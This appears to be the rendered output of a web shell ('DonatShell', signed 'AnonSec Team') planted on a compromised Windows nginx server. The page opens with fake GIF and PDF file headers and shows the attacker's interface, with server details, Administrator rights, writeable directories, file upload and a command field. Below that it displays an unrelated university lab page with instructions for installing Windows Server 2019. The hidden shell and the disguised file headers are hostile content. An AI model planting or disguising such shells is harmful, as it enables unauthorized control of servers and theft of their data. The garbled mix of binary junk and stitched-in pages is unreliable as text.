GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2274/Labs/Lab01/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2274/Labs/Lab01/Lab01.phpinc
<?
// JimMartinson/CST2274/Labs/Lab01/Lab01.phpinc

require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.

require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'.

?>
<style type="text/css">b {white-space:nowrap;}</style>
<p>
<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend>
The purpose of this lab is to install Windows 2019 Server (Desktop Experience).
<br><?=$gradeNote?>
<ol>
  <li>
    Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for all work performed in this lab.
  </li>
	<li>Create a VM for installation of Windows 2019 Server.</li>
	<li>Install Windows 2019 Standard Server (Desktop Experience).</li>
	<li>Install VMware Tools.</li>
	<li>Rename your server <b class="copyText"><?=$serverName?></b>.</li>
	<li>
		Open up <b>Control Panel / System and Security / System</b>. This will show your server's <b>Computer name</b>.
    <br>Take a screenshot and save it as <b class="copyText"><?=$saveFilename?>_DE.png</b> in your <b><?=$evaluationName?></b> folder.
		<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
		<img src="images/system.png" width="790" height="596" alt="Control Panel / System and Security / System example screenshot"/><br>
		<? showEnd (); ?>
    <br>Note that the screenshot must be saved in <a href="http://www.libpng.org/pub/png/">Portable Network Graphics</a> (.png) format.
    All screenshots for this class must be saved in <a href="http://www.libpng.org/pub/png/">Portable Network Graphics</a> (.png) format.
	</li>
  <li>Turn in your assignment:
		<ol type="a">
			<li>Ensure the following files are in your <b><?=$evaluationName?></b> folder:<?
$fileList = array(
	$saveFilename.'_DE.png',
);
	natcasesort($fileList);
						foreach ($fileList as $fileName) {
?>
				<br><?=$fileName?>
<?
						}
?>
			</li>
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b class="copyText"><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"> for grading.</li>
		</ol>
  </li>
</ol>
<?=$gradeNote?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team